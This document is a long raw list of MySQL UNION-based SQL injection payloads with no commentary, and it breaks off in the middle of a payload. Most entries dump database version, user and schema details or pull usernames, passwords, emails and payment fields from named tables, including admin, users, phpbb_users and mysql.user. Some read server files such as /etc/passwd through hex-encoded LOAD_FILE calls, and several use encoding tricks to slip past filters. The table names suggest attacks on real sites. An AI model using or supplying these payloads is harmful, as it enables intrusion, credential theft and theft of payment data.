1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/* -3 union select 1,2,3,4,5,concat_ws(char(58),username,pw),7,8,9,10,11,12,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,33 from user_logins/* 3 UNION SELECT 1,2,3,4,5 from hispano.users/* -3 UNION SELECT 1,2,3,4,5 from news -3 union select 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x70687062625F7573657273 -- -3 union select 1,2,3,4,5,UNHEX(HEX(concat_ws(0x3a,version(),database(),user()))),7,8,9,10,11,12,13,14,15-- -3 union select 1,2,3,4,5,UNHEX(HEX(version())),7,8,9,10,11,12,13,14,15-- -3 union select 1,2,3,4,5,user()/* -3 union select 1,2,3,4,5,version(),7,8,9,10,11,12-- -3 UNION SELECT 1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6,7,8,9,10,11,12 -3 union select 1,2,3,4,concat(login,0x3a,password),6,7,8,9,0,1,2 from fva_auth/* -3 union select 1,2,3,4,concat(name,char(58),password),6,7,8,9,10 from users limit 3,1/* -3 UNION SELECT 1,2,3,4,concat(pass459khyf,0x3a,secret873ktlW) from rkh8t5po -3 union select 1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3c62722f3e),6,7 from information_schema.columns-- -3 union select 1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6-- 3 union select 1,2,3,4,concat(version(),char(58),user(),char(58),database()),6/* -3 union select 1,2,3,4,concat_ws(0x3A3a,ID,USER,PASS),6,7,8,9,10,11 from admin/* -3 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database())-- 3 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8-- -3 union select 1,2,3,4,concat_ws(0x3a,login,password),6 from users -3' union select 1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11 from users-- -3 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13 from admin-- -3 union select 1,2,3,4,concat_ws(0x3a,vchUserName,vchUserPassword),6 from BIM_UserMaster-- -3 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9/* -3 union select 1,2,3,4,concat_ws(char(58,58),user(),database(),version()),6/* 3 UNION SELECT 1,2,3,4,grou_concat(cjorpmdatetime,0x3a,cjorpmerrormsg,0x3a,cjorpmerrorcode,0x3a,cjorpmppprotectelig,0x3a,cjorpmpppayerstatus,0x3a,cjorpmpppayerid,0x3a,cjorpmpptype,0x3a,cjorpmpppendreason,0x3a,cjorpmppstatus,0x3a,cjorpmcccvv,0x3a,cjorpmccavscode,0x3a,cjorpmccfour,0x3a,cjorpmcctype,0x3a,cjorpmtransid,0x3a,cjorpmfeeamt,0x3a,cjorpmamttaxable,0x3a,cjorpmamount,0x3a,cjorpmstatus,0x3a,cjorpmmethod,0x3a,cjorderid,0x3a,cjpaymentid),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from zcj_orpayments LIMIT 1,1- -3' union select 1,2,3,4,LOAD_FILE(0x2F7777772F65696C617434752F7777772F666F72756D2F696E6465782E706870),6,7 from admin /* -3 union select 1,2,3,4,@@version,6,7 -- 3 union select 1,2,3,4,version(),6,7,8/* -3 union select 1,2,3,4,version(),6 users -3/**/union/**/select/**/1,2,3,cast(concat_ws(0x3a,version(),user(),database()) as binary),5 -- -3 union select 1,2,3,concat(0x2a,version(),0x2a,database(),0x2a,user()),5,6,7,8,9,10 -3 union select 1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6-- -3' union select 1,2,3,concat_ws(0x3a3a,login,pass),5 from users -- 3 UNION SELECT 1,2,3,concat_ws(0x3a,admin,admin_pw,admin_fullname,admin_email),5,6,7,8,9,10 from passenger_ads.phpads_config-- -3 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11,12,13,14,15-- -3 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from information_schema.tables-- -3 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -3 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 3 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14 limit 1,1/* -3 union select 1,2,3,concat_ws(0x3a,version(),user()),5,6,7,8,9,10-- -3 union select 1,2,3,concat_ws(0x3a,version(),user()),5,6,7,8,9,10,11,12,13,14-- -3 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16-- -3 union select 1,2,3,group_concat(0x0b,table_name),5,6 from information_schema.tables -- -3 union select 1,2,3,group_concat(0x0b,user_id,0x3a,user_password) from rv_auth_user-- -3 union select 1,2,3,group_concat(0x0b,user_name,0x3a,password),5,6,7,concat_ws(0x0b,version(),user(),database(),@@version_compile_os) from administrator-- -3 union select 1,2,3,group_concat(unhex(hex(admin_password)),0x3a,unhex(hex(admin_code))),5,6,7,8,9,10 from se_admins -- -3 union select 1,2,3,unhex(hex(concat_ws(0x0b,version(),user(),database(),@@version_compile_os)))-- 3 union select 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables/* -3 union select 1,2,3,version(),5,6,7-- -3 union select 1,2,3,version(),5,6,7,8,9,null,11-- 3 union select 1,2,3,version(),5,user(),database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 3 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),Database(),User()),0x71),0x71),4 -3 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,version(),database(),user()),0x71),0x71),4,5,6,7,8,9 -3 union select 1,2,aes_decrypt(aes_encrypt(password,0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from mysql.user/* -3 union select 1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14/* -3 UNION SELECT 1,2,concat(user,0x3a,pass),4,5 from user -3 union select 1,2,concat(user(),0x3a,version())/* -3 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -3 union select 1,2,concat(username,0x20,password,0x20,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from clienti-- -3 union select 1,2,concat(username,char(58),password) from admins limit 0,1 -3 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/* -3 union select 1,2,concat(version(),char(58,58),database(),char(58,58),user()),4/* -3 UNION SELECT 1,2,concat_ws(0x0b,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- -3 UnIon Select 1,2,concat_ws(0x2e,table_schema,table_name),4 from information_schema.tables limit 17,1-- 3 union select 1,2,concat_ws(0x2f,login,password),4,5,6,7,8,9,10,11,12,13,14 from web_register_tempusers limit 1,1-- -3 union select 1,2,concat_Ws(0x3a3a,tcuser,tcpass,email,tcid,tcname),4,5,6,7 from tbltelecenter-- -3 union select 1,2,concat_ws(0x3a3a,UserLogin,UserPassword),4,5,6,7,8,9,10,11 from user -- -3 union select 1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9,10 from w_users -- -3 union select 1,2,concat_ws(0x3a,aname,apass,aemail),4 from tadmin-- -3 union select 1,2,concat_ws(0x3a,database(),user(),version()) 3 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12-- -3 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14-- -3 union select 1,2,concat_ws(0x3a,id,username,password,email,level,last_login) from admins limit 0,1/* -3 union select 1,2,concat_ws(0x3a,username,icq,password),4 from chatusers limit 1,1 -3' union select 1,2,concat_ws(0x3a,versioN()),4,5,6,7,8,9,10,11,12,13 from admin/* -3 union select 1,2,concat_ws(0x3a,version(),database(),user()) -3/**/union/**/select/**/1,2,concat_ws(0x3a,Version(),Database(),User()),4 -- -3' /*!union*/ select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12 -- -3 union select 1,2,concat_ws(0x3a,version(),@@version_compile_os,user()),4,5,6-- -3 union select 1,2,convert(version() using latin1) -3 union select 1,2,group_concat(user,char(58),password),4,5,6,7,8 from mysql.user -3 union select 1,2,LOAD_FILE(0x2f6574632f706173737764) -3' union select 1,2,LOAD_FILE(0x2F7573722F7777772F6273682F68746D6C2F636F6E6669672E706870),4,5,6,7,8,9 from mysql.user /* -3 union select 1,2,table_name from information_schema.tables limit 28,1 3' UNION SELECT 1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7 LIMIT 1,1-- -3 union select 1,2,unhex(hex(version()))-- 3 union select 1,2,user(),4,version(),6,7,8 -- -3 union select 1,2,user(),database(),version()/* -3 union select 1,2,version(),4-- -3' union select 1,2,version(),4,5,6,7,8,9,0,11,12-- -3 union select 1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* 3 UnIon selECt 1,2,version(),4,5,6,7,8,9,10,11,12,13,14 -- -3 union select 1,2,version(),4,5 from mysql.user/* -3 union select 1,2,version(),4,5,@@version_compile_os,7,concat(user(),0x3a3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -3 union select 1,aes_decrypt(aes_encrypt(concat(admin_login,char(58),admin_password),0x71),0x71),3,4,5,6 from admin_settings/* -3 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),user_password),0),0),3,4,5,66,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from phpbb_users limit 1,1/* -3 UnIon selECt 1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),3,4 from information_schema.tables limit 0,1-- -3 union select 1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/* -3 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),73),73),3,4,5/* -3 union select 1,clave from motor_bbdd.usuarios -- -3 union select 1,column_name,TABLE_NAME,4,5,6 from information_schema.columns/* -3 union select 1,concat(0x7c,user(),0x7c,database(),0x7c,version()),3,4,5-- -3 union select 1,concat(id,char(58),name,char(58),lastname),3,4,5,6,7,8,9,10 from person limit 0,1/* -3 UNION SELECT 1,concat(login,0x3a,pass),3,4,5 from users -3 union select 1,concat(LOGIN,0x3a,PASSWORD,0x3a,REG_MAIL),3,4,5,6,7,8,9,10,11,12,13,14,15 from system_users -3 union select 1,concat(name,char(58),password),3,4,5,6,7,8 from admins/* -3 union select 1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user/* -3 union select 1,concat(user(),0x3a,version()),3,4,5,6/* -3 union select 1,concat(user,char(58),password),3 from mysql.user-- -3 union select 1,concat(username,0x3a,user_password) from phpbb_users limit 1,1/* -3 union select 1,concat(username,char(32,58,32),password),3,4 from cms_admin-- -3 union select 1,concat(version(),0x2f2f2f,user(),0x2f2f2f,database()),group_concat(table_name separator 0x0a),4,5,6,7 from information_schema.tables -- 3 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5 -3 union select 1,concat(version(),0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),concat(concat_ws(0x3a,User,Password,file_priv)),4 from mysql.user limit 1,1-- -3 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4-- -3 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7-- -3 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os,@@tmpdir,@@datadir,@@basedir,concat(user,0x3a3a,password)),load_file(0x2F6574632F706173737764),4 from mysql.user-- -3 union select 1,concat_ws(0x203a20,username,password),3 from admin_users/* -3 union select 1,concat_ws(0x203a20,user(),version()),3,4,null,6,7,8,9,10 from mysql.user-- -3 union select 1,concat_ws(0x3a3a3a,login,pass,email),3 from users limit 6,1-- 3 union select 1,concat_ws(0x3a3a3a,version(),database(),user()),3,4,5,6,7,8,9,10,11-- -3' union select 1,concat_ws(0x3a3a,id,email,pass,creation,societe,nom,prenom,rcs,tel,categorie,admin,reponse,inactif),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from membre -- -3 union select 1,concat_ws(0x3a3a,id,login,senha,ultimo_logon,entidade) from ca_usuario -- -3 union select 1,concat_ws(0x3a3a,id,nam,pas1,pas2,blk,pay,dat),3 from cln /* -3 union select 1,concat_ws(0x3a,client_email,client_pwd),3,4,5,6,7 from client/* -3 UNION SELECT 1,concat_ws(0x3a,client,password,name),3,4,5,6 from login_client/* -3 union select 1,concat_ws(0x3a,login,password),3,4,5,6 from users -3 union select 1,concat_ws(0x3a,login,password),3 from users-- -3 union select 1,concat_ws(0x3a,login,password,reg_date,last_date,sess),3 from users limit 1,1-- -3 union select 1,concat_ws(0x3a,name,pass,hostname),3 from buildhosts -3 Union Select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14-- -3 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -3 union select 1,concat_ws(0x3a,username,password),3,4 from users -3 union select 1,concat_ws(0x3a,username,password),3 from administration/* -3 union select 1,concat_ws(0x3a,user,password),3 from users limit 0,1/* -3 union select 1,concat_ws(0x3a,user(),version(),database()),3 -- -3 UNION SELECT 1,CONCAT_WS(0x3a,user(),version(),database()),3,4-- -3 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -3 union select 1,concat_ws(0x3a,version(),0x3a,user(),@@version_compile_os),3-- 3 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3 LIMIT 1,1/* -3 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11-- 3 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6 -- -3 union select 1,concat_ws(0x3b,version(),user(),database()) -- -3 union select 1,concat_ws(char(58),TABLE_SCHEMA,table_name,column_name),3,4 from information_schema.columns/* -3 union select 1,concat_ws(char(58),username,password,email),3,4 from u9758.sp_users limit 1/* -3 union select 1,concat_ws(char(58),version(),database(),user()),3,4,5,6,7/* 3 union select 1,concat_ws(user(),0x3a,version(),0x3a,database()),3,4,5/* -3 union select 1,concat_ws(version(),user(),database()),3,4,5-- -3 union select 1,convert(version() using latin1),3/* -3 union select 1,database(),3-- -3 union select 1,database(),version()/* -3 union select 1,database(),version(),4,5/* -3 union select 1,file_priv,user,password from mysql.user -3 union select 1,group_concat(0x0b,TABLE_NAME),3 from information_schema.tables-- -3 union select 1,group_concat(column_name),4,2 from information_schema.columns where table_name=0x62645f666f72756d -- -3 union select 1,group_concat(table_name separator 0x0b) from information_schema.tables where table_schema=0x76657374695f7572616c-- -3 union select 1,id,3 from admin -3 union select 1,null,3 3'/**/UNION/**/SELECT/**/1,password,3 from mysql.user/* 3 union select 1,table_name,3,4,5,6,7,8,9,0,11 from information_schema.tables-- -3 UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables -3 union select 1,table_name,3,4,5,6,7,8 from information_schema.tables limit 70,1# 3 union select 1,unhex(hex(LOAD_FILE(0x2F6574632F706173737764))) from mysql.user /* -3 union select 1,user(),3,4,version(),6,database(),8/* 3 union select 1,username,password,4,5,6 from users -3 union select 1,user(),version(),database(),5/* -3 union select 1,version(),3,4,5 /* -3 union select 1,version(),3,4,5,4,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1-- -3 union select 1,version(),database()-- -3 union select 1,version(),database() ,USER(),5-- 3 union select concat(table_name,0x3a) from information_schema.tables -3 union select concat(User,0x20,Password),2,3,4,5 from mysql.user-- -3 union select concat(user(),0x3a,version(),0x3a,database(),0x3a,curdate(),0x3a,now()),2,3,4,5,6,7/* -3 union select concat(username,char(58),passwd,char(58),auth),2,3 from cms_auth -3 union select concat(version(),0x2F,database(),0x2F,user()) 3 union select CONCAT(Version(),Database(),User()) limit 1,1-- -3' UNION SELECT concat_Ws(0x0b,user(),version(),database()) -- -3 union select concat_ws(0x0b,version(),user(),database(),@@version_compile_os),2,3,4,5,6,group_concat(0x0b,username,0x3a,pass,0x3a,email),8,9,10,11,12,13,14,15 from admin-- -3 union select concat_ws(0x2F,uid,uname,pass),2 from shir_users limit 3,3/* -3 union select concat_ws(0x3a3a,num_admin,login,password),2,3,4,5,6,7 from admin limit 1,1 -- -3 union select concat_ws(0x3a,username,password) from users limit 1,1 -3 union select concat_ws(0x3a,version(),database(),user()) -- -3 UNION SELECT concat_ws(0x3a,version(),database(),useR()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -3 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2 -- -3 union select group_concat(0x0b,table_name),2,3,4 from information_schema.tables-- -3 union select login,2,pass,4,5,6,7 from admin/* -3 UNION SELECT pass,login,rand_id from u47894_emaika.shop_admin limit 0,1-- -3 union select (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x) -- -3 union select unhex(hex(version())),2,3/* -3 union select user() -- -3 union select user(),2/* -3 union select USER(),DATABASE()/* 3 union select version(),2,3,4,5 limit 1,1/* 3 where prod.id=3/* 4000000 UNION SELECT 1,concat_ws(0x3a,login,password) from u58209_glg.dealers/* -4000501 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21-- -4003 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12,13 40040633 and 1=0 union select table_name,2 from information_schema.tables limit 142,1-- 400 union select 1,name,3,4,5,pwd,email,8,9,10,11,12,13,14,15,16 from users/* 40103 union select 1,aes_decrypt(aes_encrypt(concat(version(),0x3a,user(),0x3a,database(),0x71),0x71),0x71)/* 4015 and ascii(substring(version(),1,1))=0x35/* -401 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -401 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- -401 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4-- -401 union select 1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13 -401 union select 1,2,group_concat(0x0b,nickname,0x3a3a,password,0x3a3a,pass_md5,0x3a3a,email),4 from order_users-- -401 union select 1,2,group_concat(0x0b,uname,0x3a3a,upass,0x3a3a,email),4 from users-- -401 union select 1,2,group_concat(0x0b,username,0x3a3a,email,0x3a3a,pass),4 from admin-- 401 union select 1,concat_ws(0x3a3a,login,password) from utilisateur -- -401 union select concat_ws(0x3a,login,password),2,3,4,5 from adminlist-- -402 union select 1,2,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7 from information_schema.columns/* -402 union select 1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4 -402 union select 1,version(),3,4,5,6,7,8,9-- 4031 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User(),@@version_compile_os),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 LIMIT 1,1-- -4037 union select 1,2,3,4,concat_ws(0x3b,version(),user(),database()),6,7,8,9,0,1,2 -4039 union select 1,password,username,4,5,6,7,8,9 from users/* -40416 union select null from sys.dual-- 4048' union select 1,2,3,4,5,6,7,8,9,10,11,version(),user(),14,15,16,17,18,19,20 -- -404 UnIon selECt 1,2,3,4,5,6,7,8,9,10,uNhex(hEx(coNcaT_wS(0x3a,username,user_password))) FroM phpbb_users LimiT 1,1 -- -4051 union select 1,concat_ws(0x3a,login,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from u40007.users limit 1,1-- -405 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14 from admin/* -4066 UNION SELECT 1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),8,9,10,11-- -406 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,version(),user(),database()),12 -- -406 union select 1,2,3,4,5,6,7,8,9,concat(user(),0x3a,version(),0x3a,database()),11,12-- -406 union select 1,concat_ws(0x3a3a,primary_key,user,password,userlevel,radio,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from tbl_user -- -4077' union select 1,2,3,concat(email,pass),5,6,7,8,9 from users/* -4077' union select 1,2,3,concat_ws(0x3a,username,u ser_password,user_email),5,6,7,8,9 from phpbb_user s/* 407 and 1=0 union select 1,2,0x4861636b6564204279204f7373747564696f2121,4,5,6,concat_ws(0x3a3a3a,user(),database(),version()),8,9,10,11,12-- -407 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11/* -407' union select 1,2,concat_Ws(0x3a3a,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from bztv_usuarios -- 407' union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7-- 408' and 1=0 union select version(),2 -- 408 UNION SELECT 1,2,concat_ws(0x3a,password,email) FROM member-- 408 UNION SELECT 1,2,concat_ws(0x3a,password,email) FROM member/* -408 UnIon selECt 1,2,version(),4,5,6,7,8,9,10 poll_user-- -408 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 40-999.9 union select version(),2,3,4,5,6,7,8 -- -409 union select 1,2,pass,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users -409 unIon seleCt 1,concat_ws(0x3a,user(),version(),database()) -- 40 and 1=0 union select 1,2,3,4,version(),6,7,8,9 -- 40 and 1=0 union select 1,version()-- 40 AND ASCII(SUBSTRING((select version()),1,1))>x 40 and false union select 1,unhex(hex(concat(user_name,0x3a,user_pass))),3,4,5,6 from user-- -40 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,version(),user(),database())-- -40 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13 -- -40 union select 1,2,3,4,5,6,concat(username,char(58),password),8,9,10,11,12,13,14,15,16 from cms.cms_users limit 0,1/* -40 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16/* 40 union select 1,2,3,4,5,6,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),8,9,10,11,12,13,14,15,16,17,18,19 limit 1,1/* -40 union select 1,2,3,4,5,concat_ws(0x3a3a,login,password,email),7,8,9,10,11 from user -- -40' union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13-- -40 union select 1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x70687062625f7573657273 -- -40 union select 1,2,3,4,5,version(),7,8 -40' union select 1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x7a),0x7a),6 from mysql.user/* 40 UNION SELECT 1,2,3,4,concat(version(),0x3a,0x3a, user(),0x3a,0x3a,database()),6-- 40 union select 1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11 limit 1,1 40 union select 1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11 limit 1,1/* -40 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user())-- 40 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18 -40 UnIon SeLect 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15 /* -40 UnIon selECt 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18-- 40 union select 1,2,3,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12-- -40 union select 1,2,3,concat(uname,0x3a,pass),5,6,7,8 from users limit 1,1 -40 union select 1,2,3,concat(username,char(58),password),5,6 from users/* -40' union select 1,2,3,concat_ws(0x203a20,version(),database(),user(),@@version_compile_os)-- -40 union select 1,2,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),4,5,6,7 -40 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11-- -40 union select 1,2,concat_Ws(0x3a,user(),database(),version()),4,5,6,7-- -40 union select 1,2,coNCAT_ws(chAR(42,32,42),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -40' union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x7573657273 -- -40 union select 1,2,table_name,4,5,6,7,8,9,10,11 from INFORMATION_SCHEMA.TABLES limit 20,1/* 40 union select 1,2,user(),4,5,6,7 -- -40 union select 1,2,user(),database(),version(),6,7,8,9 from users/* -40 union select 1,concat(user(),0x3a,version()),3,4,5,6,7,8,9/* -40 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10/* -40 union select 1,group_concat(username,char(58),password),3,4,5,6 from eb_user_login -- -40 union select 1,passwd,3,4,5,6,7,8,9,10,11,12 from users/* -40 union select 1,user(),3,4,5,6,7,8,9/* -40 union select concat(version(),0x3a,user(),0x3a,database()),2/* -40 union select concat_ws(0x3a,login,password),2,3,4,5 from partners limit 3,1 -40 union select group_concat(email),2 from cpa_experts.users -- -40 union select null,TABLE_NAME,null FROM INFORMATION_SCHEMA.TABLES-- -40 union select null,TABLE_NAME,null FROM INFORMATION_SCHEMA.TABLES limit 1 offset 2-- -40 union select version(),2,3,4,5 -- -4101 union select 1,2,3,4,5,unhex(hex(concat_ws(0x0,version(),user(),database())))-- -410 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9-- 41113' union select concat_ws(0x3a,user(),database(),version())/* -41179 union select 1,concat_ws(0x3a3a,id,username,password),3,4,5,6 from tps_users -- -4118 union select 1,login,pass,4,5,6 from cms_admin limit 0,1 /* -411 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -41260 union select 1,2,3,4,5,6,concat_ws(0x3a,email,paypal,passwd),8,9,10,11,12,13 from beg_users limit 700,1-- -4127 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user(),database())/* -4128) union select concat_ws(char(58),version(),user(),database()) -- 4129 UnIon selECt 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 412 and 1=0 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,UNHEX(HEX(version())),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 -- 412 union select 1,2,3,4,concat_ws(0x3a,username,password,email),6,7,8,9 from alumni_admins -- -412 union select null,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,13,13,14,15 from Accounts-- 41348 union select 0,1,2,3,version(),5,6,7,8,9,10,11,12,13,14,table_name from INFORMATION_SCHEMA.TABLES LIMIT 1,1-- -413 union select 1,2,3,4,user(),6/* -413 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,44/* -41400 union select 1,2,3,4,5,6,7,8,concat_ws(char(32),user(),version(),database())/* 414114 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ## 41_45 and 1=1-- -414 union select concat_ws(0x3a,user,password) from mysql.user-- 4150 union select 1,2,3,4,5,6,7 from msysaccessobjects 415 UNION SELECT 0,concat_Ws(0x0b,user(),database(),version()),2,3,4 -415 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,0,1,2-- -415 union select concat(user(),version(),database()),2,3,4,5/* -415 UNION SELECT concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8 FROM admin -- -415 union select concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from users/* -416 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3b,0x3b,user(),version(),database()),8,9,10,11,12,13,14,15 -- -416' union select version(),2,3,4,5,6 -- 417652-- 4177 union select concat_ws(0x3a,login,pass) from db_magput.users-- -417 union select 1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11-- -417 union select 